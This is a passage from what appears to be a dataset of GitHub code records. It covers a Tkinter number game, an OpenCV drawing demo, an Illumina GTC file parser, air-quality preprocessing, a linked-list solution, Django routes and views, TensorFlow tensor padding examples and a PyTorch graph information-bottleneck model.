self.cell = Frame(self.background, bg=\"#9e948a\",\r\n width=500 / 6,\r\n height=500 / 10)\r\n self.cell.grid(row=i, column=j, padx=5,\r\n pady=5)\r\n self.t = Button(master=self.cell, text=\"\",\r\n bg=\"#9e948a\",\r\n justify=CENTER, font=(\"Verdana\", 20, \"bold\"), width=4, height=2)\r\n self.t._coords = i, j\r\n self.t.grid()\r\n grid_row.append(self.t)\r\n\r\n self.grid_cells.append(grid_row)\r\n \r\n def init_matrix(self):\r\n \r\n self.matrix = []\r\n for i in range(6):\r\n self.matrix.append([]) \r\n for j in range(10):\r\n self.matrix[i].append(0)\r\n self.num=np.random.choice(10,60,p=[0.181,0.169,0.15,0.134,0.117,0.084,0.066,0.05,0.033,0.016])\r\n \r\n self.matrix=np.reshape(self.num,(6,10))\r\n for i in range(6):\r\n for j in range(10):\r\n self.matrix[i][j]+=1\r\n \r\n \r\n def start_grid(self):\r\n for i in range(len(self.matrix)):\r\n for j in range(len(self.matrix[i])):\r\n new_number = self.matrix[i][j]\r\n self.grid_cells[i][j].configure(text=str(new_number), bg=BACKGROUND_COLOR_CELLS[new_number])\r\n self.update_idletasks() \r\n \r\n def countdown(self): \r\n if self.timeleft > 0: \r\n self.timeleft -= 1\r\n self.timeLabel.config(text = \"Time left: \"+str(self.timeleft)) \r\n self.timeLabel.after(1000, self.countdown)\r\n\r\n def random_num(self):\r\n if len(self.l)==0:\r\n print(\"Game over!! Check your score\")\r\n else:\r\n \r\n random.shuffle(self.l)\r\n self.rnum=self.l[0]\r\n self.l.remove(self.l[0])\r\n self.numLabel.config(text = \"NUMBER: \"+str(self.rnum))\r\n self.list_comb.clear()\r\n self.timeLabel.after(10000, self.random_num)\r\n\r\n \r\n def game_widgets(self):\r\n self.buttonframe = tk.Frame(self)\r\n self.buttonframe.grid(row=1, column=0, columnspan=1)\r\n \r\n\r\n self.scorel=tk.Label(self.buttonframe, text = \" SCORE: \"+str(self.score),fg=\"red\",font=(\"Helvetica\", 14))\r\n self.scorel.grid(row=1, column=5)\r\n self.timeLabel=tk.Label(self.buttonframe, text = \"Time left: \" +\r\n str(self.timeleft), font = ('Helvetica', 12))\r\n self.timeLabel.grid(row=1, column=4)\r\n self.numLabel=tk.Label(self.buttonframe, text = \"NUMBER: \" +\r\n str(self.rnum), font = ('Helvetica', 12))\r\n self.numLabel.grid(row=1, column=1)\r\n \r\n if self.timeleft==100:\r\n self.countdown()\r\n self.random_num()\r\n \r\n #tk.Button(self.buttonframe, text = \"New Game\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#28b4bd\",command=self.startgame,justify=RIGHT).grid(row=1, column=10)\r\n tk.Button(self.buttonframe, text = \"INSTRUCTIONS\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#72549d\",command=self.instruction,justify=RIGHT).grid(row=1, column=12)\r\n tk.Button(self.buttonframe, text = \"MENU\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#9e948a\",command=self.start,justify=RIGHT).grid(row=1, column=14)\r\n\r\n def start(self):\r\n \"\"\"Menu page of the game where user will have two options\"\"\"\r\n self.rootframe.destroy()\r\n self.background.destroy()\r\n self.buttonframe.destroy()\r\n self.rootframe = tk.Frame(self)\r\n self.rootframe.grid(row=1, column=0, columnspan=1)\r\n tk.Label(self.rootframe, text = \"CHECK NUMBERS\",bg=\"#72549d\",width=80, height=25,padx=1,pady=1,fg=\"white\",font=(\"Helvetica\", 14)).grid(row=1, column=2)\r\n tk.Button(self.rootframe, text = \"Start Game\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#28b4bd\",command=self.startgame,justify=RIGHT).grid(row=2, column=1)\r\n tk.Button(self.rootframe, text = \"INSTRUCTIONS\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#72549d\",command=self.instruction,justify=RIGHT).grid(row=2, column=3)\r\n \r\n def startgame(self):\r\n \"\"\"Start the game with orginal grid by generating new number and started time\"\"\"\r\n self.score=0\r\n self.rootframe.destroy()\r\n self.background.destroy()\r\n self.timeleft=100\r\n self.game_widgets()\r\n self.init_grid()\r\n self.init_matrix()\r\n self.start_grid()\r\n for i in range(6):\r\n for j in range(10):\r\n self.grid_cells[i][j].bind(\"\",self.tileselect)\r\n\r\n\r\n def instruction(self):\r\n \"\"\"Instructions display on the frame when clicked\"\"\"\r\n #destroy the existing frames\r\n self.rootframe.destroy()\r\n self.background.destroy()\r\n self.rootframe = tk.Frame(self,width=200, height=200,padx=100,pady=200)\r\n self.rootframe.grid(row=1, column=0, columnspan=1)\r\n tk.Button(self.rootframe, text = \"MENU\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#9e948a\",command=self.start).grid(row=0, column=0)\r\n tk.Button(self.rootframe, text = \"Start Game\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#28b4bd\",command=self.startgame).grid(row=0, column=1)\r\n tk.Label(self.rootframe, text = \"\\nINSTRUCTIONS\",fg=\"red\",font=(\"Helvetica\", 14)).grid(row=3, column=0)\r\n lb=tk.Label(self.rootframe, text = \"\\n1. Look at the random number and time left \\n \"\r\n \"2. Select pair of numbers whose sum will be equal to random number \\n\"\r\n \"3. You can also select the random number as well which is present in the grid\\n\"\r\n \"4. Each random number will arise after every 10 sec\\n\"\r\n \"5. You need to select as mush as tiles as possible and increase your score\\n\"\r\n \"READY START THE GAME!!\",font=(\"Helvetica\", 14))\r\n lb.grid(row=4,column=0)\r\n \r\n\r\n \r\nif __name__==\"__main__\":\r\n Start=Grid_num()\r\n mainloop()","repo_name":"NityaKasturey01/Check-Numbers-Game","sub_path":"Check_num_game/Full-game.py","file_name":"Full-game.py","file_ext":"py","file_size_in_byte":9346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19881831673","text":"import cv2\nimport numpy as np\n\ncanvas = np.zeros((512, 512, 3), dtype=np.uint8) + 255\n# ilk olarak merkez daha sonra yarı çapı daha sonra rengi daha sonra kalınlığı\n#daire yapmak için kalınlık -1 verilemeli\ncv2.circle(canvas, (250, 250), 100, (0, 0, 255), thickness=5)\n\ncv2.imshow(\"canvas\", canvas)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"kundakcii/opencv-respo","sub_path":"cizim_fonksiyonlari/cember_cizme.py","file_name":"cember_cizme.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74166280489","text":"#! /usr/bin/python\n\n# zCall: A Rare Variant Caller for Array-based Genotyping\n# Jackie Goldstein\n# jigold@broadinstitute.org\n# April 5th, 2012\n\n# The Illumina provided Code was provided as-is and with no warranty as to performance and no warranty against it infringing any other party's intellectual property rights.\n\nimport struct\nimport math\n\nclass GTC:\n ''' Class for parsing GTC file'''\n\n def __init__(self, filename, bpmNormIDs):\n ''' Init function for class. Input is a .gtc file '''\n self.f = open(filename, 'rb') # open file handler for binary file\n\n self.TOC = self.parseTOC() # parse table of contents to get location of other information\n self.sampleName = self.parseString(10) # parse sample name\n self.samplePlate = self.parseString(11) # parse sample plate\n self.sampleWell = self.parseString(12) # parse sample well\n self.clusterFile = self.parseString(100) # parse what cluster file was used\n self.snpManifest = self.parseString(101) # parse what snp manifest was used\n self.imagingDate = self.parseString(200) # parse imaging date\n self.autoCallDate = self.parseString(201) # parse autocall date\n self.autoCallVersion = self.parseString(300) # parse autocall version\n self.callRate = self.parseFloat(1006) # parse call rate\n self.lrrDev = self.parseFloat(1008) # parse SD(LRR)\n \n\n I_ctrl = 0 # control data only\n if(bpmNormIDs == 'qcplot'):\n self.rawXcontrol = self.extractIntensities(500) # parse raw x intensities into python list object\n self.rawYcontrol = self.extractIntensities(501) # parse raw y intensities into python list object\n I_ctrl = 1\n elif(bpmNormIDs == 'gtonly'):\n pass\n else:\n ## this is wrong\n self.BPMnormIDs = bpmNormIDs # list with norm ID for each snp\n# self.normalizationTransformations = self.extractNormalizationTransformations(400) # parse normalization transformation arrays into python dictionary where key is the order they appeared in the gtc file and the value is a dictionary with keys offset_x, offset_y,scale_x, scale_y, shear, theta and values are floats \n# self.normXintensities, self.normYintensities = self.normalizeIntensities()\n \n\n \n if(I_ctrl == 0):\n self.rawXintensities = self.extractIntensities(1000) # parse raw x intensities into python list object\n self.rawYintensities = self.extractIntensities(1001) # parse raw y intensities into python list object\n self.genotypes = self.extractGenotypes(1002) # parse genotypes (0,1,2,3) into python list object\n self.baseCalls = self.extractBaseCalls(1003) # parse basecalls (AT,TT,AT,--) into python list object\n\n\n\n \n def parseTOC(self):\n '''Parse Table of Contents of GTC file\n No input\n Output is a dictionary where the ID for that entry is the key and the value is the offset for that variable in the GTC file\n '''\n self.f.seek(4,0)\n line = self.f.read(4)\n\n count = struct.unpack(\"i\",line)[0] \n TOC = {}\n\n for i in range(count): \n line = self.f.read(2)\n id = struct.unpack(\"h\",line)\n line = self.f.read(4) \n offset = struct.unpack(\"I\",line)\n TOC[id[0]] = offset[0]\n\n return TOC\n\n def parseFloat(self,id):\n '''\n Extract a string variable from GTC file such as SampleName.\n Input is ID for that variable in TOC\n Output is a string\n ''' \n offset = self.TOC[id]\n self.f.seek(offset,0)\n\n line = self.f.read(4)\n x = struct.unpack(\"f\",line)[0]\n\n return x\n\n def parseString(self,id):\n '''\n Extract a string variable from GTC file such as SampleName.\n Input is ID for that variable in TOC\n Output is a string\n ''' \n offset = self.TOC[id]\n self.f.seek(offset,0)\n\n line = self.f.read(1)\n nbytes = struct.unpack(\"b\",line)[0]\n line = self.f.read(nbytes)\n type = nbytes * \"s\"\n x = \"\".join(list(struct.unpack(type, line)))\n \n return x\n\n def extractIntensities(self, id):\n '''\n Extract intensity values (x or y depending on input ID).\n Input is ID for variable of interest in TOC\n Output is a list with integer intensity values in the order they were parsed\n ''' \n intensities = []\n offset = self.TOC[id]\n\n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n self.numSNPs = count\n \n for i in range(count):\n line = self.f.read(2)\n y = struct.unpack(\"H\",line)\n intensities.append(y[0])\n\n return intensities\n\n def extractNormalizationTransformations(self, id):\n '''\n Extract normalization transformation arrays\n Input is ID for Normalization Transformations in TOC.\n Output is dictionary where keys are the order xForm array appears in gtc file (ex: 1,2,3...).\n The values of the dictionary are another dictionary\n where the keys are shear, offset_x, offset_y, theta, scale_x, scale_y and the values are floats\n '''\n normTransforms = {}\n offset = self.TOC[id]\n\n self.normIDlist = list(set(self.BPMnormIDs)) # ordered list of unique normIDs\n self.normIDlist.sort()\n \n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n\n for i in range(count):\n line = self.f.read(4)\n line = self.f.read(48)\n x = struct.unpack(\"<12f\", line)\n normTransforms[self.normIDlist[i]] = {\"offset_x\":x[0],\"offset_y\":x[1],\"scale_x\":x[2],\"scale_y\":x[3],\"shear\":x[4],\"theta\":x[5]}\n\n return normTransforms\n \n def extractBaseCalls(self, id):\n '''\n Extract base calls.\n Input is id for BaseCalls in TOC\n Output is a list with one basecall for each SNP (ex: AT, GT,AA...)\n '''\n baseCalls = []\n offset = self.TOC[id]\n\n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n\n for i in range(count):\n line = self.f.read(2)\n calls = struct.unpack(\"ss\",line)\n baseCalls.append(calls[0] + calls[1])\n\n return baseCalls\n\n def extractGenotypes(self, id):\n '''\n Extract genotypes.\n Input is ID for Genotypes in TOC\n Output is a list with one genotype per SNP (0,1,2,3)\n '''\n genotypes = []\n offset = self.TOC[id]\n\n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n\n for i in range(count):\n line = self.f.read(1)\n gt = struct.unpack(\"b\",line)\n genotypes.append(gt[0])\n \n return genotypes\n\n def normalizeIntensities(self):\n '''\n Use Normalization transformations to convert raw intensities to normalized intensities\n No Input\n Outputs are normalized x and y intensities in python lists\n '''\n normXIntensities = []\n normYIntensities = []\n \n for i in range(self.numSNPs):\n xraw = self.rawXintensities[i]\n yraw = self.rawYintensities[i]\n normID = self.BPMnormIDs[i]\n\n offset_x = self.normalizationTransformations[normID][\"offset_x\"]\n offset_y = self.normalizationTransformations[normID][\"offset_y\"]\n scale_x = self.normalizationTransformations[normID][\"scale_x\"]\n scale_y = self.normalizationTransformations[normID][\"scale_y\"]\n theta = self.normalizationTransformations[normID][\"theta\"]\n shear = self.normalizationTransformations[normID][\"shear\"]\n\n tempx = xraw - offset_x\n tempy = yraw - offset_y\n\n tempx2 = math.cos(theta) * tempx + math.sin(theta) * tempy\n tempy2 = -1 * math.sin(theta) * tempx + math.cos(theta) * tempy\n\n tempx3 = tempx2 - (shear * tempy2)\n tempy3 = tempy2\n\n xn = tempx3 / float(scale_x)\n yn = tempy3 / float(scale_y)\n\n if xn < 0:\n xn = 0.0\n if yn < 0:\n yn = 0.0\n\n normXIntensities.append(xn)\n normYIntensities.append(yn)\n\n return (normXIntensities, normYIntensities) \n","repo_name":"eatsai/snp_pipe","sub_path":"processdata/GTC.py","file_name":"GTC.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2826112629","text":"import numpy as np\nimport pandas as pd\nimport os\nimport unicodedata\n\n# train: x\nx = {}\ntrain = os.scandir('./dataset/TRAIN')\ntrain_aws = os.scandir('./dataset/TRAIN_AWS')\nregion = {'아름동': '세종고운', '신흥동': '세종연서', '노은동': '계룡', '문창동': '오월드', '읍내동': '장동', \n '정림동': '오월드', '공주': '공주', '논산': '논산', '대천2동': '대천항', '독곶리': '대산', '동문동': '태안', \n '모종동': '아산', '신방동': '성거', '예산군': '예산', '이원면': '태안', '홍성읍': '홍북', '성성동': '성거'}\n\nfor file in region.keys():\n x = {}\n pm_datapath = './dataset/TRAIN/' + unicodedata.normalize('NFC', file) + '.csv'\n pm_data = pd.read_csv(pm_datapath, index_col=False)\n aws_datapath = './dataset/TRAIN_AWS/' + unicodedata.normalize('NFC', region[file]) + '.csv'\n aws_data = pd.read_csv(aws_datapath, index_col=False)\n \n df_x = pd.DataFrame({\n 'date': pm_data['일시'],\n 'PM': pm_data['PM2.5'],\n 'temperature': aws_data['기온(°C)'],\n 'direction': aws_data['풍향(deg)'],\n 'velocity': aws_data['풍속(m/s)'],\n 'rain': aws_data['강수량(mm)'],\n 'humidity': aws_data['습도(%)'],\n }, )\n \n df_x.to_csv(f'./data/{file}.csv', index=False)\n\n","repo_name":"drizzle0171/Assignment","sub_path":"AI-term-prj/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18535085861","text":"import os\n\ndef extract_entity_name(filename):\n return filename.split('.')[0]\n\ndef read_lines(filename):\n _file = open(os.path.join('data/meta-data', filename), 'rt')\n data = _file.read().split('\\n')\n _file.close()\n return data\n\ndef read_metadata(filename):\n metadata = []\n for column in read_lines(filename):\n if column:\n metadata.append(tuple(column.split('\\t')[:3]))\n return metadata\n\ndef prompt():\n print('\\nWhat do you looking for?')\n print('(l) List entities')\n print('(a) Show attributes of an entity')\n print('(r) Show references about entity')\n print('(x) Exit')\n return input()\n\ndef main():\n # dict entity name -> attrb\n meta = {}\n # dict id -> entity name\n keys = {}\n # dict of relationships between entities\n relationships = {}\n\n for meta_file in os.listdir('data/meta-data'):\n table_name = extract_entity_name(meta_file)\n attrb = read_metadata(meta_file)\n identifier = attrb[0][0]\n\n meta[table_name] = attrb\n keys[identifier] = table_name\n\n for key, val in meta.items():\n for col in val:\n if col[0] in keys:\n if not col[0] == meta[key][0][0]:\n relationships[key] = keys[col[0]]\n\n option = prompt()\n while option != 'x':\n if option == 'l':\n for entity_name in meta.keys():\n print(entity_name)\n elif option == 'a':\n entity_name = input('Give the name of entity: ')\n for col in meta[entity_name]:\n print(col)\n elif option == 'r':\n entity_name = input('Give the name of entity: ')\n try:\n print(relationships[entity_name])\n except KeyError as error:\n print('Key {} have no relationships'.format(error))\n else:\n print('not exists!\\n')\n option = prompt()\n\nif __name__ == '__main__':\n main()\n","repo_name":"bruferrari/py-data","sub_path":"wc-br-2014/scrub_data.py","file_name":"scrub_data.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21316284887","text":"# 给你链表的头节点 head ,每 k 个节点一组进行翻转,请你返回修改后的链表。\r\n# k 是一个正整数,它的值小于或等于链表的长度。如果节点总数不是 k 的整数倍,那么请将最后剩余的节点保持原有顺序。\r\n# 你不能只是单纯的改变节点内部的值,而是需要实际进行节点交换。\r\nfrom typing import Optional\r\n\r\n\r\nclass ListNode:\r\n def __init__(self, val=0, next=None):\r\n self.val = val\r\n self.next = next\r\nclass Solution:\r\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\r\n n=0\r\n cur=head\r\n while cur:\r\n cur=cur.next\r\n n+=1\r\n dummy=ListNode(next=head)\r\n p0=dummy\r\n pre=None\r\n cur=p0.next\r\n while n>=k:\r\n n-=k\r\n for _ in range(k):\r\n nxt=cur.next\r\n cur.next=pre\r\n pre=cur\r\n cur=nxt\r\n nxt=p0.next\r\n nxt.next=cur\r\n p0.next=pre\r\n p0=nxt\r\n return dummy.next","repo_name":"Ww0225/pythonTest","sub_path":"K个一组翻转链表.py","file_name":"K个一组翻转链表.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12680532269","text":"from django.urls import path, include\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'),\n\n path('add_food/', AddFood, name='add_food'),\n path('delete_food//', DeleteFood.as_view(), name='delete_food'),\n path('change_food//', ChangeFood.as_view(), name='change_food'),\n\n path('add_meal/', AddMeal, name='add_meal'),\n path('delete_meal//', DeleteMeal.as_view(), name='delete_meal'),\n path('change_meal//', ChangeMeal.as_view(), name='change_meal'),\n\n path('add_racion/', AddRacion, name='add_racion'),\n path('delete_racion//', DeleteRacion, name='delete_racion'),\n path('change_racion//', ChangeRacion, name='change_racion'),\n\n path('accounts/demo_login/', demo_login, name='demo_login'),\n\n path('test', test_session, name='test'),\n\n #path('accounts/register/activate//', user_activate, name='register_activate'),\n #path('accounts/register/done/', RegisterDoneView.as_view(), name='register_done'),\n #path('accounts/register/', RegisterUserView.as_view(), name='register'),\n #path('accounts/login/', BJULoginView.as_view(), name='login'),\n\n #path('accounts/password/reset/done/', BJUPasswordResetDoneView.as_view(), name='password_reset_done'),\n #path('accounts/password/reset/', BJUPasswordResetView.as_view(), name='password_reset'),\n #path('accounts/password/confirm/complete/', BJUPasswordResetCompleteView.as_view(), name='password_reset_complete'),\n #path('accounts/password/confirm///', BJUPasswordResetConfirmView.as_view(), name='password_reset_confirm'),\n\n #path('accounts/password/change/', BJUPasswordChangeView.as_view(), name='password_change'),\n path('accounts/logout/', logout_view, name='logout'),\n path('data_transfer/', data_transfer, name='data_transfer'),\n path('data_delete/', data_delete, name='data_delete'),\n path('data/', data, name='data'),\n]\n","repo_name":"Bondilya/eda","sub_path":"bjuk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37110081890","text":"#!/usr/bin/env python3\n\nimport csv\n\nids_bks = dict()\nbks_ids = dict()\nwith open('data/userlibri_test_id.txt','r') as f:\n bks = [a.strip() for a in f.readlines()]\n\n\nwith open('/DB/UserLibri/audio_data/metadata.tsv', 'r') as f:\n reader = csv.reader(f, delimiter='\\t')\n querys = [r[0] for r in reader]\n querys.pop(0)\n for x in querys: # x = 'speaker-260-book-3748'\n print(x)\n bks_ids.setdefault(x.split('-')[3],x.split('-')[1])\n\nfor bk in bks: # bk = 'test-clean_3748'\n bkid = bk.split('_')[1] # 3748\n ids_bks.setdefault(bks_ids[bkid], set()) # 260 : (3748)\n ids_bks[bks_ids[bkid]].add(bk)\n\nwith open('data/id_to_books.txt','w') as f2:\n for key in ids_bks.keys():\n bkids = ' '.join(list(ids_bks[key]))\n f2.write(f'{key}\\t{bkids}\\n')","repo_name":"lcw2014/icefall","sub_path":"egs/librispeech/ASR/utils/book_to_id.py","file_name":"book_to_id.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8577410705","text":"# @File :hgib.py\n# @Github :https://github.com/wufan2021/Heterogeneous-Graph-Information-Bottleneck\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.functional import softplus\n\nfrom module.graph_lib.gcn import GCN\n\n\nclass MIEstimator(nn.Module):\n def __init__(self, size1, size2):\n \"\"\"Mutual Information Estimation\"\"\"\n super(MIEstimator, self).__init__()\n # 多层感知机\n self.net = nn.Sequential(\n nn.Linear(size1 + size2, 1024),\n nn.ReLU(True),\n nn.Linear(1024, 1024),\n nn.ReLU(True),\n nn.Linear(1024, 1),\n )\n \n # 互信息的梯度与散度\n # Gradient for JSD mutual information estimation and EB-based estimation\n def forward(self, x1, x2):\n pos = self.net(torch.cat([x1, x2], 1)) # Positive Samples\n neg = self.net(torch.cat([torch.roll(x1, 1, 0), x2], 1))\n return -softplus(-pos).mean() - softplus(\n neg).mean(), pos.mean() - neg.exp().mean() + 1\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_feats, n_hidden1=512, n_hidden2=128, activation=F.relu):\n super(Encoder, self).__init__()\n self.base_gcn = GCN(in_feats, n_hidden1, activation)\n self.mean_gcn = GCN(n_hidden1, n_hidden2,\n act=lambda x: x)\n \n def forward(self, g, x):\n h = self.base_gcn(g, x)\n mean = self.mean_gcn(g, h)\n return mean\n \n \nclass HGIB(nn.Module):\n def __init__(self, g1, g2, fts, n_hidden2=128, beta=1e-3):\n super(HGIB, self).__init__()\n self.g1 = g1\n self.g2 = g2\n self.beta = beta\n self.encoder_v1 = Encoder(fts.shape[1])\n # self.encoder_v2 = Encoder()\n self.encoder_v2 = self.encoder_v1\n self.mi_estimator = MIEstimator(n_hidden2, n_hidden2)\n self.kl_estimator_1 = MIEstimator(n_hidden2, n_hidden2)\n self.kl_estimator_2 = MIEstimator(n_hidden2, n_hidden2)\n\n self.loss = None\n \n def forward(self, x1, x2):\n # view1的embedding,其pooling后的结果为v1,view2同理\n z1 = self.encoder_v1(self.g1, x1)\n v1 = torch.mean(z1, dim=0)\n v1 = v1.expand_as(z1)\n \n z2 = self.encoder_v2(self.g2, x2)\n v2 = torch.mean(z2, dim=0)\n v2 = v2.expand_as(z2)\n \n mi_gradient, mi_estimation = self.mi_estimator(z1, z2)\n mi_gradient = mi_gradient.mean()\n mi_estimation = mi_estimation.mean()\n \n skl_v1_z2, _ = self.kl_estimator_1(v1, z2)\n skl_v2_z1, _ = self.kl_estimator_2(v2, z1)\n skl = skl_v1_z2 + skl_v2_z1\n skl = skl.mean()\n \n self.loss = -mi_gradient + self.beta * skl\n \n return mi_estimation\n \n def compute_loss(self):\n return self.loss\n \n def embed(self, fts, z1w, z2w):\n z1 = self.encoder_v1(self.g1, fts)\n z2 = self.encoder_v2(self.g2, fts)\n return z1 * z1w + z2 * z2w, z1, z2\n","repo_name":"jingjing12110/CIB-VQA","sub_path":"module/graph_lib/hgib.py","file_name":"hgib.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42731122132","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 4 16:45:22 2020\r\n@Discription:这里阐述了一些关于张量的填充与复制操作\r\ntf.pad: 对于一个输入张量,在张量的维度周围进行指定数据的填充\r\n 第二个参数一定是一个 n,2 的矩阵,n为输入矩阵的秩,2表示在指定维度的前后\r\ntf.tile:对于一个输入张量,在内存中复制若干次,达到目标\r\n 第二个参数是一个维度和输入矩阵一样的列表,列表内容表明在该指定维度复制几次,\r\n 其中1次表明不变。\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\na = tf.range(9)\r\na = tf.reshape(a,[3,3])\r\n\r\nprint(a)\r\n\r\n#1. tf.pad\r\n\r\nb = tf.pad(a,[[2,1],[0,0]])\r\nprint(b)\r\n#援引官方文档的说法,指定参数是一个 [n,2]的矩阵,其中n表示输入有多少维\r\n#2表示是在这个维度的前面,还是后面,具体的参数大小表示加多少个padding的数值\r\n\r\nb = tf.pad(a,[[2,1],[0,1]],constant_values = 2)\r\n#在所有行的 前面加 2行2 \r\n# 后面加1行2\r\n#在所有列的 后面加 1行2\r\nprint (b)\r\n\r\n\r\n#2.数据复制操作\r\n#与broadcast_to的不同在于 广播并不会在内存层面给你扩容,而是使用某种方法压缩了空间\r\n#tf.tile可以保证是完全复制\r\n\r\nc = tf.tile(a,[1,2])\r\n#第二个参数表明了赋值次数,对应于你的维度,因此实际上最终维度的大小就是\r\n#input.shape * 2nd arg \r\n#必须保证这个维度和你的输入维度是一致的\r\nprint(c)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ShinewineW/LearningSmth","sub_path":"Tensorflow2.0xLearning/ch4/ch4_3_fill&Copy.py","file_name":"ch4_3_fill&Copy.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38057002240","text":"from distutils import bcppcompiler\r\nfrom distutils.command.upload import upload\r\nfrom multiprocessing import context\r\nfrom django.shortcuts import render\r\nfrom django.core.files.storage import FileSystemStorage\r\nfrom django.conf import urls\r\nimport pandas as pd\r\nfrom django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nimport numpy as np\r\nimport torchvision.transforms.functional as TF\r\nimport torch\r\nfrom PIL import Image\r\nfrom applic import load_model \r\nfrom django.core.files.storage import FileSystemStorage\r\nimport json\r\n\r\n# Create your views here.\r\n\r\n######## pages ##########\r\n\r\ndef asmaa(request):\r\n return render(request,'asmaa.html');\r\n\r\ndef predicet(request):\r\n return render(request,'predicet.html');\r\n\r\ndef t3(request):\r\n return render(request,'t3.html');\r\n\r\ndef page1(request):\r\n return render(request,\"page1.html\")\r\n###############################********functions *********##################################\r\n############## care plant ###########\r\ndef result(request):\r\n if request.method == 'GET':\r\n context={}\r\n var1 = int(request.GET['p1'])\r\n df=pd.read_csv('media/tuqa.csv',encoding='utf-8')\r\n info=df.iloc[var1-1][1]\r\n context[\"gg\"]=info\r\n s1 = df.iloc[var1-1][2]\r\n s2 = df.iloc[var1-1][3]\r\n s3 = df.iloc[var1-1][4]\r\n s4 = df.iloc[var1-1][5]\r\n print(\"hello\")\r\n name = str(var1)\r\n path_img = \"media/\"+name+\".jpg\"\r\n context[\"url\"] = path_img\r\n context[\"s1\"]=s1\r\n context[\"s2\"]=s2\r\n context[\"s3\"]=s3\r\n context[\"s4\"]=s4\r\n return render(request,'t3.html',context);\r\n\r\n############# backend & test image #############\r\nmodel = load_model.load_checkpoint('C:/Users/96399/Desktop/Django_project/graduation/models/checkpoint.pt')\r\nnormalize_mean = np.array([0.485, 0.456, 0.406])\r\nnormalize_std = np.array([0.229, 0.224, 0.225])\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\ndef process_image(image):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array\r\n '''\r\n # Process a PIL image for use in a PyTorch model\r\n image = TF.resize(image, 256)\r\n upper_pixel = (image.height - 224) // 2\r\n left_pixel = (image.width - 224) // 2\r\n image = TF.crop(image, upper_pixel, left_pixel, 224, 224)\r\n image = TF.to_tensor(image)\r\n image = TF.normalize(image, normalize_mean, normalize_std)\r\n return image\r\ndef predict(image_path, model, topk=5):\r\n ''' Predict the class (or classes) of an image using a trained deep learning model.\r\n '''\r\n \r\n # Implement the code to predict the class from an image file\r\n image = Image.open(image_path)\r\n image = process_image(image)\r\n \r\n with torch.no_grad():\r\n model.eval()\r\n image = image.view(1,3,224,224)\r\n image = image.to(device)\r\n predictions = model.forward(image)\r\n predictions = torch.exp(predictions)\r\n top_ps, top_class = predictions.topk(topk, dim=1)\r\n return top_ps, top_class\r\n\r\ndef predImg(request):\r\n if request.method == 'POST': \r\n context = {} \r\n uploaded_file= request.FILES['img'] \r\n fs = FileSystemStorage() \r\n name = fs.save(uploaded_file.name, uploaded_file) \r\n context[\"url\"] = fs.url(name)\r\n print(context[\"url\"]) \r\n testimage = '.'+context[\"url\"] \r\n probs,classes= predict(testimage,model)\r\n with open('media/new.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n test=pd.read_csv('media/data.csv',encoding='utf-8')\r\n a=classes[0,0].tolist()\r\n b=classes[0,1].tolist()\r\n c=classes[0,2].tolist()\r\n d=classes[0,3].tolist()\r\n e=classes[0,4].tolist()\r\n a1=cat_to_name[str(a)]\r\n b1=cat_to_name[str(b)]\r\n c1=cat_to_name[str(c)]\r\n d1=cat_to_name[str(d)]\r\n e1=cat_to_name[str(e)]\r\n x=classes[0,0].tolist()\r\n y=classes[0,1].tolist()\r\n z=classes[0,2].tolist()\r\n w=classes[0,3].tolist()\r\n j=classes[0,4].tolist()\r\n context[\"classes\"]=a1+str(y)+\"%\"\r\n 